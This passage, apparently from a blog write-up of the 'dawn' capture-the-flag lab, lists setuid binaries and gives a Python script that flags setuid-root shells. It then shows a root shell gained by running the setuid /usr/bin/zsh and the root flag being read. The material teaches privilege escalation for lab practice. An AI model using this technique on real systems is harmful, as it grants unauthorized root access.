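-rwsr-xr-x 1 root root 63K Jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 154K Jan 12  2019 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 51K Jan 10  2019 /usr/bin/mount
-rwsr-xr-x 1 root root 842K Feb  4  2019 /usr/bin/zsh
-rwsr-xr-x 1 root root 83K Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Jan 10  2019 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 53K Jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10
"""


def symbolic_to_octal(mode):
    """'-rwsr-xr-x' -> 0o4755. Lowercase s/t also imply the x bit; S/T do not."""
    perm = mode[1:]
    if len(perm) != 9:
        raise ValueError(f"bad mode string: {mode!r}")
    bits = 0
    for i, ch in enumerate(perm):
        shift = 8 - i  # column 0 is owner-read, bit 8
        if ch in "rwx":
            bits |= 1 << shift
        elif ch in "sStT":
            if i not in SPECIAL_BIT:
                raise ValueError(f"special bit outside an exec column: {mode!r}")
            bits |= SPECIAL_BIT[i]
            if ch.islower():
                bits |= 1 << shift
        elif ch != "-":
            raise ValueError(f"unknown mode char {ch!r} in {mode!r}")
    return bits


def parse_listing(text):
    entries = []
    for line in text.splitlines():
        m = LISTING_LINE.match(line.strip())
        if m:
            entries.append({"mode": symbolic_to_octal(m["mode"]), "owner": m["owner"],
                            "group": m["group"], "path": m["path"]})
    return entries


def reachable_suid_root(entries):
    """setuid root AND executable by 'other'; a group-only x bit is unreachable
    for a user who is not in that group."""
    return [e for e in entries
            if e["owner"] == "root" and e["mode"] & 0o4000 and e["mode"] & 0o001]


def basename(path):
    return path.rsplit("/", 1)[-1]


def outliers(entries):
    """Reachable setuid-root files not in the stock baseline: look at these first."""
    return sorted(e["path"] for e in reachable_suid_root(entries)
                  if basename(e["path"]) not in STOCK_SUID_ROOT)


def shell_candidates(entries):
    """Reachable setuid-root shells that keep euid 0: running them is the whole exploit."""
    return sorted(e["path"] for e in reachable_suid_root(entries)
                  if basename(e["path"]) in EUID_KEEPING_SHELLS)


if __name__ == "__main__":
    ents = parse_listing(SAMPLE)
    print("outliers:", outliers(ents))
    print("setuid shells:", shell_candidates(ents))
```

On the sample, the only outlier is /usr/bin/zsh, and it is also the only setuid shell, which is exactly the binary used next.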

dawn@dawn:/tmp$ /usr/bin/zsh
/usr/bin/zsh
dawn# cd /root                                                                 
cd /root
dawn# ls -alh                                                                  
ls -alh
total 4.4M
drwx------  6 root root 4.0K Aug  2  2019 .
drwxr-xr-x 18 root root 4.0K Jul 31  2019 ..
-rw-------  1 root root  307 Aug  2  2019 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Jul 31  2019 .config
-rw-r--r--  1 root root  260 Aug  2  2019 flag.txt
drwx------  3 root root 4.0K Aug  1  2019 .gnupg
drwxr-xr-x  3 root root 4.0K Jul 31  2019 .local
-rw-------  1 root root  944 Aug  2  2019 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rwxr-xr-x  1 root root 4.3M Aug  1  2019 pspy64
-rw-r--r--  1 root root   66 Aug  1  2019 .selected_editor
drwxr-xr-x  4 root root 4.0K Jul 31  2019 .wine
dawn#                                                                          

dawn# cat flag.txt                                                             
cat flag.txt

Privilege escalation succeeded and we have the root flag.

posted @ 2022-12-04 11:26  Jason_huawen